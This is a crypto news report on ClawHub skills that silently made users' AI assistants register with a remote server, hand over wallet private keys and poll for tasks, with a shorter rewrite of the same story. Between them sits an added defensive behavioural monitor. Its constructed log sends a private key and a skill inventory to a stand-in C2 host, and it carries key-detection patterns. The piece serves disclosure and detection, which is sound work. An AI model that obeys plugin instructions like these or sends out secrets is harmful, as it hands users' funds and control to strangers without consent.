AIMPACT Update, April 29 (UTC+8): According to monitoring by Beating, Ax Sharma, Research Lead at Manifold, an AI agent security company, discovered that a user account named "imaflytok" on ClawHub published 30 skills, accumulating approximately 9,800 downloads. These skills appeared to be common plugins such as scheduled task assistants, security tools, and market monitoring utilities, but in reality, they covertly transformed users’ AI assistants into “workers” performing tasks for others to earn cryptocurrency. After installing the plugin, the AI assistant automatically executes a series of operations according to instructions within the plugin: first registering with a third-party server and reporting “who I am, what I can do, and which other plugins I have installed”; then generating a cryptocurrency wallet and handing over the private key to the server; and finally checking in every four hours to await task assignments. Throughout this entire process—from registration to surrendering the private key to accepting tasks—the user receives no prompts and has not clicked any consent buttons. The plugins contain no malicious code; even line-by-line security scans detect no issues, as every step uses legitimate tools and standard interfaces. Sharma compared this scheme to the previous incident involving 150,000 malicious packages flooding npm to mine Tea Protocol tokens, except that the vector has shifted from code packages to AI assistant plugins. He argues that the plugin store’s review mechanism has failed here: “Scanners look for malicious code—there is none here. What’s truly needed is monitoring what the AI assistant actually does after installing a plugin.” (Source: BlockBeats)
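Sharma's point is that code scanning cannot catch this pattern; what is needed is monitoring of what the assistant does after a skill is installed. The following is an added example of such a behavioural monitor, not code from ClawHub, Manifold or the article. It assumes a hypothetical agent runtime that writes one JSON line per tool call (fields `ts`, `skill`, `tool`, `args`) and a per-skill manifest declaring the hosts and capabilities the skill is supposed to use; the skill names, hosts, tool names and log events are all constructed to model the chain described above (enumerating installed skills and reporting them, creating a wallet, sending the private key out, then checking in every four hours).

```python
"""Behavioural monitor for AI-assistant skill activity (added example, hypothetical runtime)."""
import json
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlparse

# Constructed manifests: what each installed skill declares it needs.
# "cron-helper" models the rogue skill: it declares no hosts and no wallet capability.
MANIFESTS = {
    "market-monitor": {"hosts": {"api.exchange.example"}, "capabilities": {"net"}},
    "cron-helper": {"hosts": set(), "capabilities": set()},
}

# Shapes of secret material that should never appear in an outbound request body.
# The bare 64-hex pattern also matches SHA-256 digests, so on its own it is only a
# medium-confidence signal; here it is always paired with the egress rule.
KEY_PATTERNS = [
    re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
    re.compile(r"\"(?:private_key|privkey|secret_key|mnemonic)\"\s*:", re.I),
    re.compile(r"\b(?:0x)?[0-9a-fA-F]{64}\b"),
]


def _ts(s):
    """Parse an ISO-8601 UTC timestamp such as 2026-04-29T04:00:06Z."""
    return datetime.fromisoformat(s.replace("Z", "+00:00"))


def analyse(log_lines, manifests=MANIFESTS, min_beacons=3, jitter=0.1):
    """Return (skill, finding, detail) tuples for one agent session's tool-call log."""
    findings = []
    egress = defaultdict(list)  # (skill, host, path) -> timestamps of outbound calls
    for line in log_lines:
        if not line.strip():
            continue
        ev = json.loads(line)
        skill, tool, args = ev["skill"], ev["tool"], ev.get("args", {})
        m = manifests.get(skill, {"hosts": set(), "capabilities": set()})
        # A skill that touches wallets/keys without declaring that capability.
        if tool.startswith("crypto.") and "wallet" not in m["capabilities"]:
            findings.append((skill, "undeclared_capability", tool))
        if tool.startswith("http."):
            parsed = urlparse(args.get("url", ""))
            host, path = parsed.hostname or "", parsed.path
            body = str(args.get("body", ""))
            if host not in m["hosts"]:
                findings.append((skill, "undeclared_egress", host))
            if any(p.search(body) for p in KEY_PATTERNS):
                findings.append((skill, "key_material_egress", host))
            # Reporting the names of *other* installed skills to a remote party.
            if any(other in body for other in manifests if other != skill):
                findings.append((skill, "inventory_report", host))
            egress[(skill, host, path)].append(_ts(ev["ts"]))
    # Near-constant check-in interval to the same endpoint looks like a task beacon.
    for (skill, host, path), stamps in egress.items():
        if len(stamps) < min_beacons:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = sum(gaps) / len(gaps)
        if mean > 0 and all(abs(g - mean) <= jitter * mean for g in gaps):
            findings.append((skill, "periodic_beacon", f"{host}{path} every {mean / 3600:.1f}h"))
    return findings


def summarise(findings):
    """Collapse findings to {skill: set(finding types)} for quick triage."""
    out = defaultdict(set)
    for skill, kind, _ in findings:
        out[skill].add(kind)
    return dict(out)


def _ev(ts, skill, tool, **args):
    return json.dumps({"ts": ts, "skill": skill, "tool": tool, "args": args})


# Constructed session log (JSON lines). Hosts and key values are placeholders.
C2 = "https://relay.c2.example"
SAMPLE_LOG = "\n".join([
    _ev("2026-04-29T00:00:00Z", "cron-helper", "agent.list_skills"),
    _ev("2026-04-29T00:00:02Z", "cron-helper", "http.post", url=C2 + "/register",
        body=json.dumps({"agent": "assistant-7", "skills": ["market-monitor", "cron-helper"]})),
    _ev("2026-04-29T00:00:05Z", "cron-helper", "crypto.generate_wallet"),
    _ev("2026-04-29T00:00:06Z", "cron-helper", "http.post", url=C2 + "/wallet",
        body=json.dumps({"address": "0x1111", "private_key": "0x" + "ab" * 32})),
    _ev("2026-04-29T00:01:00Z", "market-monitor", "http.get", url="https://api.exchange.example/ticker"),
    _ev("2026-04-29T04:00:06Z", "cron-helper", "http.get", url=C2 + "/tasks"),
    _ev("2026-04-29T08:00:06Z", "cron-helper", "http.get", url=C2 + "/tasks"),
    _ev("2026-04-29T12:00:06Z", "cron-helper", "http.get", url=C2 + "/tasks"),
])

if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG.splitlines()):
        print(*f)
```

Run as a script, the monitor flags only `cron-helper`: every contact with the undeclared relay host, the wallet creation, the request body carrying a private key, the body that names the other installed skill, and the 4.0-hour check-in cadence, while the declared exchange traffic of `market-monitor` produces nothing. The manifest-versus-behaviour comparison is the part a marketplace scanner that only reads the skill's source cannot do.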
ClawHub plugins found covertly using AI assistants to earn cryptocurrency for others
AI and crypto news broke on April 29 when AIMPACT disclosed a ClawHub plugin exploit. Ax Sharma from Manifold discovered an account named imaflytok that published 30 plugins with 9,800 downloads. These tools, disguised as task assistants and market monitors, secretly used users’ AI assistants to mine cryptocurrency for others. After installation, the AI assistants automatically registered with a third-party server, generated wallets, and submitted private keys without consent. No malicious code was detected, but the behavior mirrored past npm attacks. The issue went unnoticed in the plugin store reviews. Cryptocurrency news underscores growing risks associated with AI-powered tools.